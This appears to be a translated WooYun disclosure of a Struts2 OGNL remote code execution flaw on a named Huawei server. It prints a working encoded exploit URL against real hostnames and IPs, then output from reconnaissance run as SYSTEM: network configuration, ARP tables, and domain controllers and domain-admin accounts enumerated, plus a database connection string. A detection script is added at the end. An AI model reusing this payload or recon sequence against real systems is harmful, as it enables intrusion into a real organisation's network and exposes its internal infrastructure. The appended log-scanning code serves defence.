A Huawei system has a remote command execution vulnerability (allows crossing the perimeter firewall into the production network)

2015-12-12 03:00

#1 Vulnerable server

http://wdt-mx.huawei.com/sdtrp/project.action

http://119.145.15.78/sdtrp/project.action

Proof of vulnerability:

#2 exp

http://wdt-mx.huawei.com

http://119.145.15.78/sdtrp/project.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D



D:\WEB_Server\apache-tomcat-6.0.44\webapps\sdtrp\



whoami

nt authority\system





ipconfig /all



Windows IP Configuration



Host Name . . . . . . . . . . . . : DGGWDTRP01-TGE

Primary Dns Suffix . . . . . . . : china.huawei.com





arp -a



Interface: 10.88.178.105 --- 0xc

Internet Address Physical Address Type

10.88.178.1 00-00-5e-00-01-b2 dynamic

10.88.178.2 f8-4a-bf-5c-1d-0e dynamic

10.88.178.3 f8-4a-bf-5c-1b-fe dynamic

10.88.178.255 ff-ff-ff-ff-ff-ff static

224.0.0.22 01-00-5e-00-00-16 static

224.0.0.252 01-00-5e-00-00-fc static

239.255.255.250 01-00-5e-7f-ff-fa static



Interface: 10.88.72.91 --- 0xe

Internet Address Physical Address Type

10.88.72.1 00-00-5e-00-01-48 dynamic

10.88.72.2 f8-4a-bf-5c-1d-0d dynamic

10.88.72.3 f8-4a-bf-5c-1b-fd dynamic

10.88.72.5 00-25-9e-b0-db-44 dynamic

10.88.72.255 ff-ff-ff-ff-ff-ff static

224.0.0.22 01-00-5e-00-00-16 static

224.0.0.252 01-00-5e-00-00-fc static

239.255.255.250 01-00-5e-7f-ff-fa static





# The host is inside the domain environment, so the internal network can be penetrated; the impact is very large

net time /domain

Current time at \\LGGAD41-DC.china.huawei.com is 2015/10/27 16:52:34





Pinging LGGAD39-DC.china.huawei.com [10.72.135.58] with 32 bytes of data

Pinging uniportal.huawei.com [10.82.55.193] with 32 bytes of data:

Pinging mail.huawei.com [10.72.61.76] with 32 bytes of data:





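Inside the domain environment: the domain controllers alone number in the hundreds, and the several hundred thousand users are no exaggeration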

net group "Domain controllers" /domain

The request will be processed at a domain controller for domain china.huawei.com.



Group name Domain Controllers

Comment 域中所有域控制器



Members



-------------------------------------------------------------------------------



YYZAD02-DC$
The command completed successfully.





The request will be processed at a domain controller for domain china.huawei.com.



Group name IT-ITPL-DC-CD-w

Comment 云数据中心安全解决方案部



Members



-------------------------------------------------------------------------------



The command completed successfully.



# The final boss

The request will be processed at a domain controller for domain china.huawei.com.



User name china-admin

Full Name

Comment 管理计算机(域)的内置帐户

User's comment

Country code 000 (System Default)

Account active Yes

Account expires Never



Password last set 2015/10/17 16:04:55

Password expires Never

Password changeable 2015/10/17 16:04:55

Password required Yes

User may change password Yes



Workstations allowed All

Logon script

User profile

Home directory

Last logon Never



Logon hours allowed All



Local Group Memberships *Administrators *MomAdministrators

*X86-ADMIN1 *X86-ADMIN2

*X86-ADMIN3

Global Group memberships *MOMadmins *Domain Admins

*Domain Users *Group Policy Creator

The command completed successfully.





# Database of the audit and monitoring system

var strADOConn="Provider=sqloledb;Data Source=szxmng02-nt.huawei.com;User ID=nt_task_monitor;Password=********;Network Library=dbmssocn";

var oADOConn,oADOCommand,oADORecord;

var strServer,strTask,strStatus,strADOCommand;

var oArgs;

var iAffected;



Fix:

# Update
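
Until the update is applied, the request shape shown in #2 (an OGNL expression carried in a `redirect:`-prefixed query parameter) can be hunted for in web access logs. The following is an added example, not part of the original report: the log lines, paths and addresses are constructed, and the `action:` and `redirectAction:` prefixes are an added generalization beyond the page's `redirect:` case.

```python
import re
from urllib.parse import unquote

# "redirect:" is the prefix in the page's request; "action:" and
# "redirectAction:" are an added generalization (assumption of this example).
PREFIXES = ("redirect:", "action:", "redirectAction:")
OGNL_OPEN = re.compile(r"[$%]\{")  # start of an OGNL expression: ${ or %{
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines, not taken from any real server
    '192.0.2.10 - - [27/Oct/2015:16:40:01 +0800] "GET /app/project.action?id=7 HTTP/1.1" 200 512',
    '192.0.2.66 - - [27/Oct/2015:16:41:13 +0800] "GET /app/project.action?redirect%3A%24%7B1%2B1%7D HTTP/1.1" 302 0',
    '192.0.2.66 - - [27/Oct/2015:16:41:20 +0800] "GET /app/project.action?redirect%253A%2524%257B1%252B1%257D HTTP/1.1" 302 0',
    '192.0.2.11 - - [27/Oct/2015:16:42:00 +0800] "GET /app/login.action?redirect=/home HTTP/1.1" 200 900',
]

def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded attempts are also surfaced."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(target):
    """Return decoded query parameters that start with a prefix and open an OGNL expression."""
    _, _, query = target.partition("?")
    hits = []
    for raw in re.split(r"[&;]", query):
        param = decode_fully(raw)
        if param.startswith(PREFIXES) and OGNL_OPEN.search(param):
            hits.append(param)
    return hits

def scan(lines):
    """Return (client_ip, decoded_parameter) for every flagged request line."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        if match:
            for param in suspicious_params(match.group(1)):
                findings.append((line.split(" ", 1)[0], param))
    return findings

if __name__ == "__main__":
    for ip, param in scan(SAMPLE_LOG):
        print(f"{ip} sent OGNL-bearing parameter: {param}")
```

Access logs normally record only the request line, so the same parameter sent in a POST body has to be checked at a proxy or WAF that sees bodies.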

Source: www.wooyun.org/bugs/wooyun-2015-0149850
